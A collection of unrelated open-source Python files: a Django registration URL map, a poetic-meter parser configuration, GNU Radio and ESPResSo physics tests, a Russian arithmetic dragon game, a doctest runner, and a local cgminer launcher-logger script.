# Copyright (C) 2012 Aaron Krebs akrebs@ualberta.ca # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/> from django.views.generic.simple import direct_to_template from django.contrib.auth import views as auth_views from django.conf.urls import patterns, url from django.core.urlresolvers import reverse_lazy from registration.views import register urlpatterns = patterns('', # urls for simple one-step registration url(r'^register/$', register, {'backend': 'registration.backends.simple.SimpleBackend', 'template_name': 'registration/registration_form.hamlpy', }, name='registration_register' ), url(r'^register/closed/$', direct_to_template, {'template': 'registration/registration_closed.hamlpy'}, name='registration_disallowed' ), url(r'^login/$', auth_views.login, {'template_name': 'registration/login.hamlpy'}, name='auth_login' ), url(r'^logout/$', auth_views.logout, {'template_name': 'registration/logout.hamlpy'}, name='auth_logout' ), url(r'^password/change/$', auth_views.password_change, {'template_name': 'registration/password_change_form.hamlpy', # ugh, this is tied to the namespace; needs to be namespace-agnostic # since the namspace is determined by the importing app # TODO: see Issue #1 'post_change_redirect': reverse_lazy('registration:auth_password_change_done') }, name='auth_password_change' ), url(r'^password/change/done/$', auth_views.password_change_done, {'template_name': 'registration/password_change_done.hamlpy'}, name='auth_password_change_done' ), url(r'^password/reset/$', auth_views.password_reset, {'template_name': 'registration/password_reset_form.hamlpy', # same issue as above 'post_reset_redirect': reverse_lazy('registration:auth_password_reset_done'), 'email_template_name': 'registration/password_reset_email.hamlpy', 'subject_template_name': 'registration/password_reset_subject.hamlpy', }, name='auth_password_reset' ), url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.password_reset_confirm, {'template_name': 'registration/password_reset_confirm.hamlpy', # same issue as above 'post_reset_redirect': reverse_lazy('registration:auth_password_reset_complete'), }, name='auth_password_reset_confirm' ), url(r'^password/reset/complete/$', auth_views.password_reset_complete, {'template_name': 'registration/password_reset_complete.hamlpy'}, name='auth_password_reset_complete' ), url(r'^password/reset/done/$', auth_views.password_reset_done, {'template_name': 'registration/password_reset_done.hamlpy'}, name='auth_password_reset_done' ), )
quadrismegistus/prosodic
meters/strength_and_resolution.py
############################################ # [config.py] # CONFIGURATION SETTINGS FOR A PARTICULAR METER # # # Set the long-form name of this meter name = "*PEAK only" # # [Do not remove or uncomment the following line] Cs={} ############################################ ############################################ # STRUCTURE PARAMETERS # # Parameters subject to conscious control by the poet. Kiparsky & Hanson (1996) # call these "formally independent of phonological structure." By contrast, # "realization parameters"--e.g., the size of a metrical position, which positions # are regulated, and other constraints--"determine the way the structure is # linguistically manifested, and are dependent on the prosodic givens of languge." # # #### # [Number of feet in a line] # #Cs['number_feet!=2'] = 1 # require dimeter #Cs['number_feet!=3'] = 1 # require trimeter #Cs['number_feet!=4'] = 1 # require tetrameter #Cs['number_feet!=5'] = 1 # require pentameter #Cs['number_feet!=6'] = 1 # require hexameter #Cs['number_feet!=7'] = 1 # require heptameter # # #### # [Headedness of the line] # #Cs['headedness!=falling'] = 1 # require a falling rhythm (e.g. trochaic, dactylic) #Cs['headedness!=rising'] = 1 # require a rising rhythm (e.g., iambic, anapestic) # ############################################ ############################################ # REALIZATION PARAMETERS # # All subsequent constraints can be seen as "realization parameters." # See note to "structure parameters" above for more information. # ############################################# # METRICAL PARSING: POSITION SIZE # # Select how many syllables are at least *possible* in strong or weak positions # cf. Kiparsky & Hanson's "position size" parameter ("Parametric Theory" 1996) # # ###### # [Maximum position size] # # The maximum number of syllables allowed in strong metrical positions (i.e. "s") maxS=2 # # The maximum number of syllables allowed in weak metrical positions (i.e. "w") maxW=2 # # ###### # [Minimum position size] # # (Recommended) Positions are at minimum one syllable in size splitheavies=0 # # (Unrecommended) Allow positions to be as small as a single mora # i.e. (a split heavy syllable can straddle two metrical positions) #splitheavies=1 ############################################ ############################################ # METRICAL PARSING: METRICAL CONSTRAINTS # # Here you can configure the constraints used by the metrical parser. # Each constraint is expressed in the form: # Cs['(constraint name)']=(constraint weight) # Constraint weights do not affect harmonic bounding (i.e. which parses # survive as possibilities), but they do affect how those possibilities # are sorted to select the "best" parse. # # ###### # [Constraints regulating the 'STRENGTH' of a syllable] # # A syllable is strong if it is a peak in a polysyllabic word: # the syllables in 'liberty', stressed-unstressed-unstressed, # are, in terms of *strength*, strong-weak-neutral, because # the first syllable is more stressed than its neighbor; # the second syllable less stressed; and the third equally stressed. # ### # [Stricter versions:] # # A strong metrical position should not contain any weak syllables ("troughs"): #Cs['strength.s=>-u']=1 # # A weak metrical position may not contain any strong syllables ("peaks"): # [Kiparsky and Hanson believe this is Shakespeare's meter] Cs['strength.w=>-p']=1 # ### # [Laxer versions:] # # A strong metrical position should contain at least one strong syllable: #Cs['strength.s=>p']=3 # # A weak metrical position should contain at least one weak syllable: #Cs['strength.w=>u']=3 # # # ###### # [Constraints regulating the STRESS of a syllable] # ### # [Stricter versions:] # # A strong metrical position should not contain any unstressed syllables: # [Kiparsky and Hanson believe this is Hopkins' meter] #Cs['stress.s=>-u']=1 # # A weak metrical position should not contain any stressed syllables: #Cs['stress.w=>-p']=1 # ### # [Laxer versions:] # # A strong metrical position should contain at least one stressed syllable: #Cs['stress.s=>p']=2 # # A weak metrical position must contain at least one unstressed syllable; #Cs['stress.w=>u']=2 # # # ###### # [Constraints regulating the WEIGHT of a syllable] # # The weight of a syllable is its "quantity": short or long. # These constraints are designed for "quantitative verse", # as for example in classical Latin and Greek poetry. # ### # [Stricter versions:] # # A strong metrical position should not contain any light syllables: #Cs['weight.s=>-u']=2 # # A weak metrical position should not contain any heavy syllables: #Cs['weight.w=>-p']=2 # ### # [Laxer versions:] # # A strong metrical position should contain at least one heavy syllable: #Cs['weight.s=>p']=2 # # A weak metrical position must contain at least one light syllable; #Cs['weight.w=>u']=2 # # # ###### # [Constraints regulating what's permissible as a DISYLLABIC metrical position] # [(with thanks to Sam Bowman, who programmed many of these constraints)] # ### # [Based on weight:] # # A disyllabic metrical position should not contain more than a minimal foot: # i.e. W-resolution requires first syllable to be light and unstressed. Cs['footmin-w-resolution']=1 # # # A disyllabic metrical position should not contain more than a minimal foot: # (i.e. allowed positions are syllables weighted light-light or light-heavy) #Cs['footmin-noHX']=1000 # # # A disyllabic STRONG metrical position should not contain more than a minimal foot: # (i.e. allowed positions are syllables weighted light-light or light-heavy) #Cs['footmin-s-noHX']=1 # # A disyllabic metrical position should be syllables weighted light-light: #Cs['footmin-noLH-noHX']=1 # ### # [Categorical:] # # A metrical position should not contain more than one syllable: # [use to discourage disyllabic positions] #Cs['footmin-none']=1 # # A strong metrical position should not contain more than one syllable: #Cs['footmin-no-s']=1 # # A weak metrical position should not contain more than one syllable: #Cs['footmin-no-w']=1 # # A metrical position should not contain more than one syllable, # *unless* that metrical position is the *first* or *second* in the line: # [use to discourage disyllabic positions, but not trochaic inversions, # or an initial "extrametrical" syllable] #Cs['footmin-none-unless-in-first-two-positions']=1 # # A metrical position should not contain more than one syllable, # *unless* that metrical position is the *second* in the line: # [use to discourage disyllabic positions, but not trochaic inversions] #Cs['footmin-none-unless-in-second-position']=1 # # A strong metrical position should not contain more than one syllable, # *unless* it is preceded by a disyllabic *weak* metrical position: # [use to implement the metrical pattern described by Derek Attridge, # in The Rhythms of English Poetry (1982), and commented on by Bruce Hayes # in his review of the book in Language 60.1 (1984). # e.g. Shakespeare's "when.your|SWEET.IS|ue.your|SWEET.FORM|should|BEAR" # [this implementation is different in that it only takes into account # double-weak beats *preceding* -- due to the way in which the parser # throws away bounded parses as it goes, it might not be possible for now # to write a constraint referencing future positions] #Cs['footmin-no-s-unless-preceded-by-ww']=10 # [The version that does reference future positions; but appears to be unstable]: #Cs['attridge-ss-not-by-ww']=10 # ### # [For disyllabic positions crossing a word boundary... # (i.e. having two syllables, each from a different word)... # # ...allow only F-resolutions: # (both words must be function words and be in a weak metrical position) Cs['footmin-f-resolution']=1 # # ...it should never cross a word boundary to begin with: #Cs['footmin-wordbound']=1000 # # ...both words should be function words: #Cs['footmin-wordbound-bothnotfw']=1 # # ...at least one word should be a function word: #Cs['footmin-wordbound-neitherfw']=1 # # ...the left-hand syllable should be a function-word: #Cs['footmin-wordbound-leftfw']=1 # # ...the right-hand syllable should be a function word: #Cs['footmin-wordbound-rightfw']=1 # # ...neither word should be a monosyllable: #Cs['footmin-wordbound-nomono']=1 # # ...neither word should be a LEXICAL monosyllable # (i.e. function words and polysyllabic words ok) #Cs['footmin-wordbound-lexmono']=1 ### # [Miscellaneous constraints relating to disyllabic positions] # # A disyllabic metrical position may contain a strong syllable # of a lexical word only if the syllable is (i) light and # (ii) followed within the same position by an unstressed # syllable normally belonging to the same word. # [written by Sam Bowman] #Cs['footmin-strongconstraint']=1 # # The final metrical position of the line should not be 'ww' # [use to encourage "...LI|ber|TY" rather than "...LI|ber.ty"] #Cs['posthoc-no-final-ww']=2 # # The final metrical position of the line should not be 'w' or 'ww' #Cs['posthoc-no-final-w']=2 # # A line should have all 'ww' or all 'w': # It works by: # Nw = Number of weak positions in the line # Mw = Maximum number of occurrences of 'w' metrical position # Mww = Maximum number of occurrences of 'ww' metrical position # M = Whichever is bigger, Mw or Mww # V = Nw - M # Violation Score = V * [Weight] # [use to encourage consistency of meter across line] # [feel free to make this a decimal number, like 0.25] #Cs['posthoc-standardize-weakpos']=1 # # # ###### # [MISCELLANEOUS constraints] # # A function word can fall only in a weak position: #Cs['functiontow']=2 # # An initial syllable must be in a weak position: #Cs['initialstrong']=2 # # The first metrical position will not be evaluated # for any of the strength/stress/weight correspondence constraints: # [set to 1 to be true] #Cs['extrametrical-first-pos']=1 # # The first two metrical positions will not be evaluated # for any of the strength/stress/weight correspondence constraints: # [set to 1 to be true] Cs['skip_initial_foot']=1 # # A word should not be an elision [use to discourage elisions]: #Cs['word-elision']=1 # # A weak metrical position should not contain any syllables # that are stressed and heavy: [Meter of Finnish "Kalevala"] #Cs['kalevala.w=>-p']=1 # # A strong metrical position should not contain any syllables # that are stressed and light: [Meter of Finnish "Kalevala"] #Cs['kalevala.s=>-u']=1 ############################################
andrmuel/gr-dab
python/qa/qa_measure_processing_rate.py
#!/usr/bin/env python from gnuradio import gr, gr_unittest from gnuradio import blocks import grdab class qa_measure_processing_rate(gr_unittest.TestCase): """ @brief QA for measure processing rate sink. This class implements a test bench to verify the corresponding C++ class. """ def setUp(self): self.tb = gr.top_block() def tearDown(self): self.tb = None def test_001_measure_processing_rate(self): src = blocks.null_source(gr.sizeof_gr_complex) throttle = blocks.throttle(gr.sizeof_gr_complex, 1000000) head = blocks.head(gr.sizeof_gr_complex, 200000) sink = grdab.measure_processing_rate(gr.sizeof_gr_complex,100000) self.tb.connect(src, throttle, head, sink) self.tb.run() rate = sink.processing_rate() assert(rate > 900000 and rate < 1100000) def test_002_measure_processing_rate(self): src = blocks.null_source(gr.sizeof_char) throttle = blocks.throttle(gr.sizeof_char, 10000000) head = blocks.head(gr.sizeof_char, 1000000) sink = grdab.measure_processing_rate(gr.sizeof_char,1000000) self.tb.connect(src, throttle, head, sink) self.tb.run() rate = sink.processing_rate() assert(rate > 8000000 and rate < 12000000) if __name__ == '__main__': gr_unittest.main()
hmenke/espresso
testsuite/python/drude.py
# Copyright (C) 2010-2018 The ESPResSo project # # This file is part of ESPResSo. # # ESPResSo is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # ESPResSo is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import numpy as np import unittest as ut import espressomd import espressomd.electrostatics import espressomd.interactions from espressomd import drude_helpers class Drude(ut.TestCase): @ut.skipIf(not espressomd.has_features("P3M", "THOLE", "LANGEVIN_PER_PARTICLE"), "Test needs P3M, THOLE and LANGEVIN_PER_PARTICLE") def test(self): """ Sets up a BMIM PF6 pair separated in y-direction with fixed cores. Adds the Drude particles and related features (intramolecular exclusion bonds, Thole screening) via helper functions. Calculates the induced dipole moment and the diagonals of the polarization tensor and compares against reference results, which where reproduced with LAMMPS. """ box_l = 50 system = espressomd.System(box_l=[box_l, box_l, box_l]) system.seed = system.cell_system.get_state()['n_nodes'] * [12] np.random.seed(12) #Reference Results, reproduced with LAMMPS #Dipole Moments ref_mu0_pf6 = [0.00177594, 0.16480996, -0.01605161] ref_mu0_c1 = [0.00076652, 0.15238767, 0.00135291] ref_mu0_c2 = [-0.00020222, 0.11084197, 0.00135842] ref_mu0_c3 = [0.00059177, 0.23949626, -0.05238468] ref_mu0_bmim = [0.00115606, 0.5027259, -0.04967335] #Polarisation Tensor diagonals ref_pol_pf6 = [ 4.5535698335873445, 4.7558611769477697, 4.5546580162000554] ref_pol_bmim = [ 13.126868394164262, 14.392582501485913, 16.824150151623762] #TIMESTEP fs_to_md_time = 1.0e-2 time_step_fs = 0.5 time_step_ns = time_step_fs * 1e-6 dt = time_step_fs * fs_to_md_time #COM TEMPERATURE #Global thermostat temperature, for com and langevin. #LangevinPerParticle temperature is set to 0 for drude and core to properly account for com forces. # Like that, langevin thermostat can still be used for non-drude # particles SI_temperature = 300.0 gamma_com = 1.0 kb_kjmol = 0.0083145 temperature_com = SI_temperature * kb_kjmol # COULOMB PREFACTOR (elementary charge)^2 / (4*pi*epsilon_0) in # Angstrom * kJ/mol coulomb_prefactor = 1.67101e5 * kb_kjmol #POLARIZATION #polarization = 1.0 #In (Angstrom^3)_CGS # alpha_SI = 4*Pi*eps_0 alpha_CGS; # 4*Pi*epsilon_0*Angstrom^3/((elementary charge)^2*Angstrom^2*N_A/kJ) conv_pol_CGS_SI = 7.197586e-4 #alpha = conv_pol_CGS_SI*args.polarization #DRUDE/TOTAL MASS #lamoureux03 used values 0.1-0.8 g/mol for drude mass mass_drude = 0.8 mass_tot = 100.0 mass_core = mass_tot - mass_drude mass_red_drude = mass_drude * mass_core / mass_tot #SPRING CONSTANT DRUDE #Used 1000kcal/mol/A^2 from lamoureux03a table 1 p 3031 k_drude = 4184.0 # in kJ/mol/A^2 T_spring = 2.0 * np.pi * np.sqrt(mass_drude / k_drude) #T_spring_fs = T_spring/fs_to_md_time #Period of free oscillation: T_spring = 2Pi/w; w = sqrt(k_d/m_d) #TEMP DRUDE # Used T* = 1K from lamoureux03a p 3031 (2) 'Cold drude oscillators # regime' SI_temperature_drude = 1.0 temperature_drude = SI_temperature_drude * kb_kjmol #GAMMA DRUDE #Thermostat relaxation time should be similar to T_spring gamma_drude = mass_red_drude / T_spring system.cell_system.skin = 0.4 system.time_step = dt #Forcefield types = {"PF6": 0, "BMIM_C1": 1, "BMIM_C2": 2, "BMIM_C3": 3, "BMIM_COM": 4, "PF6_D": 5, "BMIM_C1_D": 6, "BMIM_C2_D": 7, "BMIM_C3_D": 8} charges = {"PF6": -0.78, "BMIM_C1": 0.4374, "BMIM_C2": 0.1578, "BMIM_C3": 0.1848, "BMIM_COM": 0} polarizations = {"PF6": 4.653, "BMIM_C1": 5.693, "BMIM_C2": 2.103, "BMIM_C3": 7.409} masses = {"PF6": 144.96, "BMIM_C1": 67.07, "BMIM_C2": 15.04, "BMIM_C3": 57.12, "BMIM_COM": 0} masses["BMIM_COM"] = masses["BMIM_C1"] + \ masses["BMIM_C2"] + masses["BMIM_C3"] box_center = 0.5 * np.array(3 * [box_l]) system.min_global_cut = 3.5 #Place Particles dmol = 5.0 #Test Anion pos_pf6 = box_center + np.array([0, dmol, 0]) system.part.add(id=0, type=types["PF6"], pos=pos_pf6, q=charges[ "PF6"], mass=masses["PF6"], fix=[1, 1, 1]) pos_com = box_center - np.array([0, dmol, 0]) system.part.add(id=2, type=types["BMIM_C1"], pos=pos_com + [ 0, -0.527, 1.365], q=charges["BMIM_C1"], mass=masses["BMIM_C1"], fix=[1, 1, 1]) system.part.add(id=4, type=types["BMIM_C2"], pos=pos_com + [ 0, 1.641, 2.987], q=charges["BMIM_C2"], mass=masses["BMIM_C2"], fix=[1, 1, 1]) system.part.add(id=6, type=types["BMIM_C3"], pos=pos_com + [ 0, 0.187, -2.389], q=charges["BMIM_C3"], mass=masses["BMIM_C3"], fix=[1, 1, 1]) system.thermostat.set_langevin(kT=temperature_com, gamma=gamma_com) p3m = espressomd.electrostatics.P3M( prefactor=coulomb_prefactor, accuracy=1e-4, mesh=[18, 18, 18], cao=5) system.actors.add(p3m) #Drude related Bonds thermalized_dist_bond = espressomd.interactions.ThermalizedBond( temp_com=temperature_com, gamma_com=gamma_com, temp_distance=temperature_drude, gamma_distance=gamma_drude, r_cut=1.0) harmonic_bond = espressomd.interactions.HarmonicBond( k=k_drude, r_0=0.0, r_cut=1.0) system.bonded_inter.add(thermalized_dist_bond) system.bonded_inter.add(harmonic_bond) drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[ 0], 1, types["PF6_D"], polarizations["PF6"], mass_drude, coulomb_prefactor, 2.0) drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[ 2], 3, types["BMIM_C1_D"], polarizations["BMIM_C1"], mass_drude, coulomb_prefactor, 2.0) drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[ 4], 5, types["BMIM_C2_D"], polarizations["BMIM_C2"], mass_drude, coulomb_prefactor, 2.0) drude_helpers.add_drude_particle_to_core(system, harmonic_bond, thermalized_dist_bond, system.part[ 6], 7, types["BMIM_C3_D"], polarizations["BMIM_C3"], mass_drude, coulomb_prefactor, 2.0) #Setup and add Drude-Core SR exclusion bonds drude_helpers.setup_and_add_drude_exclusion_bonds(system) #Setup intramol SR exclusion bonds once drude_helpers.setup_intramol_exclusion_bonds( system, [6, 7, 8], [1, 2, 3], [charges["BMIM_C1"], charges["BMIM_C2"], charges["BMIM_C3"]]) #Add bonds per molecule drude_helpers.add_intramol_exclusion_bonds( system, [3, 5, 7], [2, 4, 6]) #Thole drude_helpers.add_all_thole(system) def dipole_moment(id_core, id_drude): pc = system.part[id_core] pd = system.part[id_drude] v = pd.pos - pc.pos return pd.q * v def measure_dipole_moments(): dm_pf6 = [] dm_C1 = [] dm_C2 = [] dm_C3 = [] system.integrator.run(115) for i in range(100): system.integrator.run(1) dm_pf6.append(dipole_moment(0, 1)) dm_C1.append(dipole_moment(2, 3)) dm_C2.append(dipole_moment(4, 5)) dm_C3.append(dipole_moment(6, 7)) dm_pf6_m = np.mean(dm_pf6, axis=0) dm_C1_m = np.mean(dm_C1, axis=0) dm_C2_m = np.mean(dm_C2, axis=0) dm_C3_m = np.mean(dm_C3, axis=0) dm_sum_bmim = dm_C1_m + dm_C2_m + dm_C3_m res = dm_pf6_m, dm_C1_m, dm_C2_m, dm_C3_m, dm_sum_bmim return res def setElectricField(E): E = np.array(E) for p in system.part: p.ext_force = p.q * E def calc_pol(mu0, muE, E): pol = (muE - mu0) / E / conv_pol_CGS_SI return pol def measure_pol(Es, dim): E = [0.0, 0.0, 0.0] E[dim] = Es setElectricField(E) mux_pf6, mux_c1, mux_c2, mux_c3, mux_bmim = measure_dipole_moments( ) return calc_pol(mu0_pf6[dim], mux_pf6[dim], Es), calc_pol(mu0_bmim[dim], mux_bmim[dim], Es) mu0_pf6, mu0_c1, mu0_c2, mu0_c3, mu0_bmim = measure_dipole_moments() eA_to_Debye = 4.8032047 atol = 1e-2 rtol = 1e-2 np.testing.assert_allclose( ref_mu0_pf6, eA_to_Debye * mu0_pf6, atol=atol, rtol=rtol) np.testing.assert_allclose( ref_mu0_c1, eA_to_Debye * mu0_c1, atol=atol, rtol=rtol) np.testing.assert_allclose( ref_mu0_c2, eA_to_Debye * mu0_c2, atol=atol, rtol=rtol) np.testing.assert_allclose( ref_mu0_c3, eA_to_Debye * mu0_c3, atol=atol, rtol=rtol) np.testing.assert_allclose( ref_mu0_bmim, eA_to_Debye * mu0_bmim, atol=atol, rtol=rtol) pol_pf6 = [] pol_bmim = [] Efield = 96.48536 # = 1 V/A in kJ / (Avogadro Number) / Angstrom / elementary charge res = measure_pol(Efield, 0) pol_pf6.append(res[0]) pol_bmim.append(res[1]) res = measure_pol(Efield, 1) pol_pf6.append(res[0]) pol_bmim.append(res[1]) res = measure_pol(Efield, 2) pol_pf6.append(res[0]) pol_bmim.append(res[1]) np.testing.assert_allclose( ref_pol_pf6, pol_pf6, atol=atol, rtol=rtol) np.testing.assert_allclose( ref_pol_bmim, pol_bmim, atol=atol, rtol=rtol) if __name__ == "__main__": ut.main()
mipt-cs-on-python3/arithmetic_dragons
tournament.py
# coding: utf-8 # license: GPLv3 from enemies import * from hero import * def annoying_input_int(message =''): answer = None while answer == None: try: answer = int(input(message)) except ValueError: print('Вы ввели недопустимые символы') return answer def game_tournament(hero, dragon_list): for dragon in dragon_list: print('Вышел', dragon._color, 'дракон!') while dragon.is_alive() and hero.is_alive(): print('Вопрос:', dragon.question()) answer = annoying_input_int('Ответ:') if dragon.check_answer(answer): hero.attack(dragon) print('Верно! \n** дракон кричит от боли **') else: dragon.attack(hero) print('Ошибка! \n** вам нанесён удар... **') if dragon.is_alive(): break print('Дракон', dragon._color, 'повержен!\n') if hero.is_alive(): print('Поздравляем! Вы победили!') print('Ваш накопленный опыт:', hero._experience) else: print('К сожалению, Вы проиграли...') def start_game(): try: print('Добро пожаловать в арифметико-ролевую игру с драконами!') print('Представьтесь, пожалуйста: ', end = '') hero = Hero(input()) dragon_number = 3 dragon_list = generate_dragon_list(dragon_number) assert(len(dragon_list) == 3) print('У Вас на пути', dragon_number, 'драконов!') game_tournament(hero, dragon_list) except EOFError: print('Поток ввода закончился. Извините, принимать ответы более невозможно.')
spikeekips/source-over-ssh
src/tests/__init__.py
# -*- coding: utf-8 -*- __all__ = [ "test_config_db", "test_grid", "test_shell", "test_svn", ] if __name__ == "__main__" : import doctest for i in __all__ : print ("%%-%ds: %%s" % (max(map(len, __all__)) + 1)) % ( i, doctest.testmod(__import__(i, None, None, [i, ], ), ), )
cecilulysess/MinerLite
main.py
#!/usr/bin/python # MinerLite - A client side miner controller. # This will launch cgminer with a few delay seconds and # retrieve the local data and post it into somewhere! # # Author: Yanxiang Wu # Release Under GPL 3 # Used code from cgminer python API example import socket import json import sys import subprocess import time import os path = "/home/ltcminer/mining/cgminer/cgminer" log_file = "/home/ltcminer/mining/minerlite.log" def linesplit(socket): buffer = socket.recv(4096) done = False while not done: more = socket.recv(4096) if not more: done = True else: buffer = buffer+more if buffer: return buffer def retrieve_cgminer_info(command, parameter): """retrieve status of devices from cgminer """ api_ip = '127.0.0.1' api_port = 4028 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((api_ip,int(api_port))) if not parameter: s.send(json.dumps({"command":command,"parameter":parameter})) else: s.send(json.dumps({"command":command})) response = linesplit(s) response = response.replace('\x00','') return_val = response response = json.loads(response) # print response s.close() return return_val def run_cgminer(path): subprocess.Popen([path, "--api-listen"]) print "Starting cgminer in 2 seconds" time.sleep(2) print "Running cgminer ..." run_cgminer(path) time.sleep(15) with open(log_file, 'a') as logfile: try: logfile.write( retrieve_cgminer_info("devs", None) ) except socket.error: pass